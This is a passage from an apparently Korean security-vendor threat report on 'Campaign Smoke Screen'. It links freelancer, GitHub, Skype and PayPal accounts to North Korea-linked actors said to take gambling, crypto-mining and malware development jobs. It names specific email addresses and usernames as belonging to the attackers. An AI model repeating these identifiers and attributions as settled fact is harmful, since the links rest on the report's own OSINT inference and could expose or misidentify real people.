[그림 25] 사행성 온라인 게임 개발 및 악성코드 개발에 참여하는 모습


그리고 한국어 국적으로 등록됐던 'Migel M' 계정은 프로필 사진은 'aji199293'이랑 동일하고, 국적이 미국에서 한국으로 다르게 설정되어 있습니다.


ESRC에서는 해당 계정이 서로 다른 것인지 비교해 본 결과, 동일한 사용자가 초기에 'Migel M'으로 사용하다가 나중에 국적과 아이디를 모두 변경한 것으로 확인하였습니다.


프리랜서 사이트에 암호화폐, 온라인 게임 개발자 등으로 활동하는 사용자들이 악성 프로그램 개발 대행에도 참여하고 있다는 점은 나름 의미하는 바가 있습니다.


'rjh917@hotmail.com' 계정을 쓰는 사용자를 추적해 보면 더욱 더 자세한 내용을 발견할 수 있게 됩니다.


GitHub 사이트 등에 동일한 아이디를 사용하는 'devAji917' 계정이 나타나게 되며, 이 계정은 2018년 4월경에 등록되었습니다.


- https://github.com/devAji917

- https://github.com/kgretzky/evilginx2/issues/253

- https://github.com/cryptonotefoundation/cryptonote/issues/221

- https://github.com/cryptonotefoundation/cryptonote/issues/222


[그림 26] 깃허브에 등록된 'devAji917' 사용자 화면


결국, 'aji199293' 아이디를 사용하는 사람이 스카이프로 'rjh917' 아이디를 사용하고, 다시 이 계정이 'devAji917'로 이어지는 것을 확인할 수 있습니다.


그리고 'aji9170' 사용자 계정과도 거의 유사하게 사용되고 있다는 점에서 동일한 사용자로 보여집니다.


'devaji917' 계정은 비트쉐어에도 가입된 것도 확인되었습니다.



[그림 27] 비트쉐어에 가입된 화면


이외에도 'devaji917' 아이디로 활동하는 사용자가 존재하는데, 구루 사이트에 미국 국적으로 등록된 사용자입니다.



[그림 28] 구루 사이트 프리랜서로 등록된 'devAji917' 화면


ESRC는 공격자를 추적하던 과정 중에 tiger199392 계정이 사용하는 'om197019621993@hotmail.com' 이메일 계정을 확인할 수 있었고, 프리랜서 사이트에서 프로젝트 개발 결제서비스로 많이 사용하는 페이팔에도 동일한 계정으로 가입된 것을 볼 수 있었습니다.



또한, 중국인 계정처럼 보이는 'Fungsyujonggu' 깃허브 계정에서 동일한 핫메일 주소가 발견되었습니다.


[그림 29] 'om197019621993@hotmail.com' 계정과 'tiger199392' 연관성 화면


[그림 12]의 'JemFedura'가 설정했던 핫메일 'jamshine1993@hotmail.com'의 마스터 계정이 'om197019621993@hotmail.com'으로 연결되고 있습니다.



■ 두 얼굴을 가진 '캠페인 스모크 스크린(Campaign Smoke Screen)' 실체


2019년 01월 30일 한 언론사의 '해외 파견된 北해커 조직 200개, 1팀당 최대 100만달러 북한 송금' 뉴스를 통해 유사한 사례가 공개된 바 있습니다.


ESRC는 국가차원의 사이버위협 가담자들이 APT 공격 뿐만 아니라, 실제 프로그램 주문개발 사이트를 통해 다양한 소프트웨어 하청을 받아 외화벌이에도 적극 참여하고 있다는 것을 확인하였습니다.


특히, 암호화폐 거래 및 마이닝 프로그램에 관심이 많았고, 사행성 도박 게임이나 악성프로그램 개발 대행 사실도 목격됐습니다.


또한, 이 과정에서 카카오톡, 스카이프, 텔레그램 등의 메신저 서비스를 통해 은밀하게 거래 사실을 숨겨왔던 것도 새롭게 드러났습니다.


자신의 신분을 위장한 채, 외국인처럼 행세하는 '스모크 스크린' 캠페인 분석을 통해 APT 위협이 다양한 형태로 진화를 거듭하고 있다는 것에 주목이 됩니다.


추가로 확인된 내용들은 '쓰렛 인사이드(Threat Inside)' 서비스를 통해 제공할 예정입니다.